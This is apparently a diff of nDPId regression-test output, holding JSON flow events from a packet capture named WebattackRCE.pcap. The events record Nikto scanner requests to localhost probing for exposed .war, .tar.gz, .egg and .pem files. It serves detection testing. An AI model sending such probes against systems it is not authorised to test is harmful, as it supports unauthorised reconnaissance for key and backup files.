-01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 